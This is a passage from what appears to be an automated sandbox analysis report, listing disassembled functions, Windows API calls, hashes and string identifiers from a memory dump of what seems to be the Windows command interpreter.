                                                                            • Opcode Fuzzy Hash: 5c93d7678e8eede4d5737dde644f7d25d576fcc5fa7f3eae365f8a424e094939
                                                                            • Instruction Fuzzy Hash: 8B516FB1900219ABEF24CB64DC99BEEB7F9EB54305F5400E9A505E3181EB349ED4CE25
                                                                            Function 00B07334 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 159COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B07381
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 00B073D6
                                                                            • wcsncmp.MSVCRT ref: 00B073F9
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000209,?,00000000,?), ref: 00B07465
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 00B1A8C6
                                                                              • Part of subcall function 00B10060: wcschr.MSVCRT ref: 00B1006C
                                                                            • wcsstr.MSVCRT ref: 00B1A87E
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00B1A89B
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B1A8DE
                                                                              • Part of subcall function 00B1589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,00B159D0,?,00B06054,-00001038,00000000,?,?), ref: 00B158BB
                                                                              • Part of subcall function 00B1589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00B159D0,?,00B06054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00B158CD
                                                                              • Part of subcall function 00B08B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00B299FD,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B08B7B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                            • String ID: \\.\
                                                                            • API String ID: 799470305-2900601889
                                                                            • Opcode ID: da90e851ee97783e3d9765d4d955c7acfa6cb764bb5abbeb874ed9803a81492f
                                                                            • Instruction ID: 915a0f718077601b1d8c93e0b04bec675a6680aff4d5b03ffbbb396fa7735648
                                                                            • Opcode Fuzzy Hash: da90e851ee97783e3d9765d4d955c7acfa6cb764bb5abbeb874ed9803a81492f
                                                                            • Instruction Fuzzy Hash: 6751F375A483019BD7309B7198846AFBEE8EF85750F0008AAF859C33D1EF70E94586A3
                                                                            Function 00B0CB09 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: wcschr$iswspace$_wcsicmp
                                                                            • String ID: &<|>$+: $=,;
                                                                            • API String ID: 3089800946-2256444845
                                                                            • Opcode ID: 91e56b0faba759bb722e0a4b66086fc73c6f75e66e78f3e5a4cc902ab31dd038
                                                                            • Instruction ID: 68bbd9f9a9875847f6bb4215fbb5d46d2a3ecc61c1055417fa9bf89d01ab503d
                                                                            • Opcode Fuzzy Hash: 91e56b0faba759bb722e0a4b66086fc73c6f75e66e78f3e5a4cc902ab31dd038
                                                                            • Instruction Fuzzy Hash: 6B312931A0022447DB208F65AC497DE7FE5EF56705F1401E5EC09D32A2FB319E64CBAA
                                                                            Function 00B2BAF8 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 336COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00B2C0F8: free.MSVCRT ref: 00B2C116
                                                                              • Part of subcall function 00B2C0F8: free.MSVCRT ref: 00B2C123
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • longjmp.MSVCRT(00B40A30,00000001,00000000,?,00000000), ref: 00B2BB97
                                                                            • qsort.MSVCRT ref: 00B2BC1A
                                                                            • wcschr.MSVCRT ref: 00B2BC6F
                                                                            • calloc.MSVCRT ref: 00B2BCB1
                                                                            • calloc.MSVCRT ref: 00B2BD82
                                                                            • wcschr.MSVCRT ref: 00B2BDCB
                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 00B2BE1D
                                                                            • memcpy.MSVCRT(00000000,?,?), ref: 00B2BE3E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                                            • String ID: &()[]{}^=;!%'+,`~
                                                                            • API String ID: 975110957-381716982
                                                                            • Opcode ID: 81ae56d3842748a5f5ad0eef1d8082eb87a6446df097ea146a62e1ffa9f4f130
                                                                            • Instruction ID: 77bed5fe90515f50f242c66ae7d06a4213814f388d2cc26aef0f14416fc8a934
                                                                            • Opcode Fuzzy Hash: 81ae56d3842748a5f5ad0eef1d8082eb87a6446df097ea146a62e1ffa9f4f130
                                                                            • Instruction Fuzzy Hash: 79C1B076A002259BDB249F68E841BEEBBF1FF44710F1544A9E848EB392EF309D41CB54
                                                                            Function 00B0B760 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 286COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _tell.MSVCRT ref: 00B0B7F9
                                                                            • _close.MSVCRT ref: 00B0B82C
                                                                            • memset.MSVCRT ref: 00B0B8CC
                                                                            • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00B0B936
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B0B947
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B0B96D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleInfoOutput_close_tellmemset
                                                                            • String ID: GOTO
                                                                            • API String ID: 1380661413-1693823284
                                                                            • Opcode ID: 224abbdf3b32072acb9ba8565f02254147215836a502463707c70698439599be
                                                                            • Instruction ID: cd93f291b2cc02c5f2174b691289473d4e1548a56f1e3fcbe58982d1e2ab6860
                                                                            • Opcode Fuzzy Hash: 224abbdf3b32072acb9ba8565f02254147215836a502463707c70698439599be
                                                                            • Instruction Fuzzy Hash: CAB1B271A443018BD724DF24D885B6BBFE6FB84700F5449ADE845972E0EB70DD85CB92
                                                                            Function 00B13065 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                            • String ID: +-~!
                                                                            • API String ID: 2191331888-2604099254
                                                                            • Opcode ID: a582bf52f803b47a7e933ddb0aabd9bc21395a2d6be4c6398f28841701c8dd4c
                                                                            • Instruction ID: 9fbfe9364d8c6240068362bd799e7a487410e5795dee37e1eee2fe8b3640fece
                                                                            • Opcode Fuzzy Hash: a582bf52f803b47a7e933ddb0aabd9bc21395a2d6be4c6398f28841701c8dd4c
                                                                            • Instruction Fuzzy Hash: FD518971500209EBCB10DF64D8899EA37E5FF06760F9081A6FC06AB150EBB19F90DBA1
                                                                            Function 00B27220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • towupper.MSVCRT ref: 00B27277
                                                                            • iswalpha.MSVCRT ref: 00B272AA
                                                                            • towupper.MSVCRT ref: 00B272BD
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 00B272EF
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B27304
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B27311
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                            • String ID: $%04X-%04X$\
                                                                            • API String ID: 4001382275-467840296
                                                                            • Opcode ID: 413bca5b9831e4df47e8584d31e06f24e498f7c5d8b4c902f9dfe1e2acd389c7
                                                                            • Instruction ID: b1353b5c5bb8a6402382b41cf670a0394873ff8b20e0cca287a9a7153c4cc3e3
                                                                            • Opcode Fuzzy Hash: 413bca5b9831e4df47e8584d31e06f24e498f7c5d8b4c902f9dfe1e2acd389c7
                                                                            • Instruction Fuzzy Hash: F1410B75648310AAD720ABA59C0AEBB77ECEF85B10F04049DF949C71C1EE709A41D7BA
                                                                            Function 00B22D1F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00B23877), ref: 00B22D31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait
                                                                            • String ID: wil
                                                                            • API String ID: 24740636-1589926490
                                                                            • Opcode ID: a89de3bd36a32a96d2cb1c993489db78dec55a0e84f38e21edd4b06e20880a63
                                                                            • Instruction ID: 0d851748519d94ffabe9273b3380567f84687e90b5ed1bec4f4a83524cdd5dec
                                                                            • Opcode Fuzzy Hash: a89de3bd36a32a96d2cb1c993489db78dec55a0e84f38e21edd4b06e20880a63
                                                                            • Instruction Fuzzy Hash: BC317534344224BBFB106B64EC84BBB36DDEF41391F6040B5F419D7290DBB4CE41A662
                                                                            Function 00B2832A Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 90windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 00B28360
                                                                            • _ultoa.MSVCRT ref: 00B28376
                                                                            • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00B2838B
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00B283A0
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 00B283D8
                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 00B2840C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                            • String ID: (#$Application$System
                                                                            • API String ID: 3377411628-593978566
                                                                            • Opcode ID: 6b2bd26d100754bdca48c2e4b768dc151939271de29f37c9e7f785cfdc034003
                                                                            • Instruction ID: f4845b118d63130ed6c8064b41e209a79a2b96abc8d25a7fa6de07f53ff28cdd
                                                                            • Opcode Fuzzy Hash: 6b2bd26d100754bdca48c2e4b768dc151939271de29f37c9e7f785cfdc034003
                                                                            • Instruction Fuzzy Hash: 31316D71A00218ABDB10DFA5DC45EEEBBFDFB49B50F104169F915E7191EB309A01CB61
                                                                            Function 00B15271 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B15294
                                                                            • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B152A4
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B21036
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B21048
                                                                            • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B21064
                                                                            • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B21073
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                            • String ID: :$\
                                                                            • API String ID: 3961617410-1166558509
                                                                            • Opcode ID: 5a0250e5b7a816c44416ef839627b1093dd4474fd85d0a81c161664283dd66bc
                                                                            • Instruction ID: 313144a4a285a4aca92d1dac4252ae0d913d79125d80a48de0567a38305ec8d4
                                                                            • Opcode Fuzzy Hash: 5a0250e5b7a816c44416ef839627b1093dd4474fd85d0a81c161664283dd66bc
                                                                            • Instruction Fuzzy Hash: D5119136900614EB97305B649C889BF77F8EB97760784059DE812D3290EF708EC596E2
                                                                            Function 00B1161D Relevance: 15.4, APIs: 10, Instructions: 419COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B11665
                                                                            • memset.MSVCRT ref: 00B11689
                                                                            • memset.MSVCRT ref: 00B116AD
                                                                            • memset.MSVCRT ref: 00B116D1
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00B117CF
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00B117E9
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00B11801
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00B11813
                                                                              • Part of subcall function 00B1260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00B11775,-00000001,-00000001,-00000001,-00000001), ref: 00B12650
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$BufferConsoleInfoScreen
                                                                            • String ID:
                                                                            • API String ID: 1034426908-0
                                                                            • Opcode ID: f9ae4360c0cb68bfbac78c383652d49b124fe56945cd8bbbc3effcc74ee2868c
                                                                            • Instruction ID: 8c06dfe7c21c64ba8196900bff412c91efc8473af0589b75829bce45ceb642da
                                                                            • Opcode Fuzzy Hash: f9ae4360c0cb68bfbac78c383652d49b124fe56945cd8bbbc3effcc74ee2868c
                                                                            • Instruction Fuzzy Hash: 36F16DB1A042199BDB249F29CC85AEABBF4FF04304F5445E9E94997281EB30DEC1CF90
                                                                            Function 00B245F9 Relevance: 15.2, APIs: 10, Instructions: 150fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00B29E02,?,?,00B29E02), ref: 00B24618
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,00B29E02), ref: 00B24637
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B3A7F0,00B29E02,?,00000000,?,00B29E02), ref: 00B24646
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,00B29E02), ref: 00B24653
                                                                            • memcmp.MSVCRT(00B3A7F0,00B034F8,00000003), ref: 00B24693
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00B29E02,00000000,?,00B29E02,?,00B29E02), ref: 00B24720
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00B29E02,00000000,00000000,?,00B29E02), ref: 00B24742
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,00B29E02), ref: 00B2474F
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F1,00000001,?,00000000,?,00B29E02), ref: 00B24764
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,00B29E02), ref: 00B24771
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                            • String ID:
                                                                            • API String ID: 2002953238-0
                                                                            • Opcode ID: 4698916c1f8d2f16b3be6e65dbd3a2004f3c313089dca5fdcc3caf956ecb8fba
                                                                            • Instruction ID: c37021b66e540fb4329527d24ef2a27335fec332ddbf3856b4a62029b1b92058
                                                                            • Opcode Fuzzy Hash: 4698916c1f8d2f16b3be6e65dbd3a2004f3c313089dca5fdcc3caf956ecb8fba
                                                                            • Instruction Fuzzy Hash: 5D510871A40224AFDB228F68EC44B7D7BF9EF52710F1841D9E859DB2A0D7B14E40CB51
                                                                            Function 00B0C897 Relevance: 15.1, APIs: 10, Instructions: 119fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,00B3A7F0,00000000,?,00000200), ref: 00B0C818
                                                                            • wcschr.MSVCRT ref: 00B0C882
                                                                            • _get_osfhandle.MSVCRT ref: 00B0C8BA
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B0C8C4
                                                                            • _get_osfhandle.MSVCRT ref: 00B0C8DB
                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B0C8ED
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 00B0C90D
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B0C91E
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B3A7F0,00000200,00000000,00000000), ref: 00B0C934
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B0C941
                                                                            • _get_osfhandle.MSVCRT ref: 00B0CAC4
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B0CACE
                                                                            • memcmp.MSVCRT(00B3A7F0,00B034F8,00000003), ref: 00B1D16E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                            • String ID:
                                                                            • API String ID: 1383533039-0
                                                                            • Opcode ID: a37cd47a3a00a5633826aa7b3006424d79bed10735075008fe8e7016d952e0fa
                                                                            • Instruction ID: b96599fc3a74fead80d52982d4d112cbd30240aa423f4aafe68b859ce341f86f
                                                                            • Opcode Fuzzy Hash: a37cd47a3a00a5633826aa7b3006424d79bed10735075008fe8e7016d952e0fa
                                                                            • Instruction Fuzzy Hash: 4541D371A403185BEB308B248C89BA97EF6FB49700F5401E9E509A72D0DBB54ED1CB96
                                                                            Function 00B10444 Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                            • API String ID: 2081463915-1668778490
                                                                            • Opcode ID: 6c5f74fe069f14a4aff9ae48fdd386b90bfa80558cfb6d9d8d91663f43a29a77
                                                                            • Instruction ID: db140da42618f21bb7015ae3cf3c1550bcd652e30ff4920a9d3e8218a3c10972
